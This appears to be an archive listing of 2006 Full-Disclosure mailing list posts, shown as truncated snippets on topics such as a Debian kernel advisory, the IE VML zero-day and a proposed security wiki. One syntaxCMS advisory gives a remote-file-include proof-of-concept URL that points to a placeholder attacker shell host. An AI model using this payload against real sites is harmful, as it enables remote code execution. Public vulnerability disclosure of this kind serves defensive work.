[Full-disclosure] [SECURITY] [DSA 1183-1] New Linux 2.4.27 packages fix several vulnerabilities

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1183-1[EMAIL PROTECTED] http://www.debian.org/security/ Dann Frazier September 25th, 2006

Re: [Full-disclosure] The truth about Rob Levin aka Liloofirc.freenode.net

Salut, On Fri, 2006-09-22 at 20:51 +0200, Diman Todorov wrote: > > [20:48] -LoRez- [Global Notice] Hi all. Some of you may not have > heard the news that Rob Levin, known to most as Freenode's head of > staff lilo, passed away on the 16th following a car accident on the > 12th. Condol

Re: [Full-disclosure] WikiSecu.com - What you think about that?

Please have a look at this site. http://www.securityforest.com/wiki/index.php/Main_Page On 9/22/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: > WikiSecu.com: > > The idea is to build a knowledge base related to computer security, which > would be democratic and driven by the community. The we

Re: [Full-disclosure] Yet another 0day for IE (Disabling Javascript no longer a fix)

Bill Stout wrote: > http://sunbeltblog.blogspot.com/2006/09/seen-in-wild-zero-day-exploit-be > ing.html > "This exploit can be mitigated by turning off Javascripting. > > Update: Turning off Javascripting is no longer a valid mitigation. ... Well, to pick a nit, the Sunbelt blog entry is corr

Re: [Full-disclosure] WikiSecu.com - What you think about that?

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I'd be very interested. [EMAIL PROTECTED] wrote: > WikiSecu.com: > > The idea is to build a knowledge base related to computer security, which > would be democratic and driven by the community. The website would be > similar to wikipedia.org > > L

Re: [Full-disclosure] Windows Automatic Gringo ZaW!

? wrote: >> So, WTF#1 is: what the hell makes them think my utterly clean >> machine could possibly be infected? What kind of pseudo "detection" >> technique are they using? So WTF#2 is: why the hell are they trying >> to push obsolete old garbage on me? >> I'm going to leave my workstation unp

[Full-disclosure] Remote File Include in syntaxCMS

Remote File Include in syntaxCMS Vulnerable File: 0004_init_urls.php Vulnerable Code: 1 PoC: http://www.poweredbysyntaxcmssite.com/admin/testing/tests/0004_init_urls.php?init_path=http://YourShell?&; Solution: Remove This File...it's not needed...just used for tests Found by M

[Full-disclosure] Windows VML Vulnerability FAQ (CVE-2006-4868) written

I have posted Frequently Asked Questions document about the unpatched Windows VML vulnerability. The document entitled as Windows VML Vulnerability FAQ (CVE-2006-4868) is located at my SecuriTeam Blogs section, http://blogs.securiteam.com/?p=640 The document describes related malware, 3rd party

[Full-disclosure] ZERT patch [was: 0day for IE (Disabling Javascript no longer a fix)]

On Sun, 24 Sep 2006, Bill Stout wrote: > http://sunbeltblog.blogspot.com/2006/09/seen-in-wild-zero-day-exploit-be > ing.html > "This exploit can be mitigated by turning off Javascripting. > > Update: Turning off Javascripting is no longer a valid mitigation. A > valid mitigation is unregistering

Re: [Full-disclosure] Yet another 0day for IE (Disabling Javascript no longer a fix)

http://sunbeltblog.blogspot.com/2006/09/seen-in-wild-zero-day-exploit-be ing.html "This exploit can be mitigated by turning off Javascripting. Update: Turning off Javascripting is no longer a valid mitigation. A valid mitigation is unregistering the VML dll. " Bill Stout -Original Message-

Re: [Full-disclosure] Linux kernel source archive vulnerable

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi, Hadmut Danisch wrote: > Your assumption is false here. The kernel maintainers DO NOT say this: > Read the README file, it does not contain any statement that you do > not have to compile as root. They silently explain how to compile if > you are n

Re: [Full-disclosure] Windows Automatic Gringo ZaW!

On Sun, 24 Sep 2006 13:48:46 +0200, =?ISO-2022-JP?B?GyRCJV4lMCVtODY7UhsoQg==?= said: > > So, WTF#1 is: what the hell makes them think my utterly clean machine could > > possibly be infected? What kind of pseudo "detection" technique are they > > usin > > So WTF#2 is: why the hell are they trying

Re: [Full-disclosure] Self-contained XSS Attacks (the new generation of XSS)

Hi Tim,    You make a great point.       Ron Jennings,  NCIE SSP     Chaser Security- A Microsoft Partner   Cell:559.360.2340 24hr.customer service   VOIP:562.365.1295 From: Tim <[EMAIL PROTECTED]>To: "pdp (architect)" <[EMAIL PROTECTED]>CC: full-disclosure@lists.grok.org.uk, bugtraq@se

Re: [Full-disclosure] Windows Automatic Gringo ZaW!

> So, WTF#1 is: what the hell makes them think my utterly clean machine could > possibly be infected? What kind of pseudo "detection" technique are they > using? > So WTF#2 is: why the hell are they trying to push obsolete old garbage on me? > I'm going to leave my workstation unplugged over the

Re: [Full-disclosure] WikiSecu.com - What you think about that?

Seeing Wikipedia's failure in creating quality content and instead succeeding in a grand waste of time for all participants and a great place for flamefests and dumping of spam, I think you should not make it a Wiki or rather put a heavy barrier before contributions are allowed. "Democratic and dr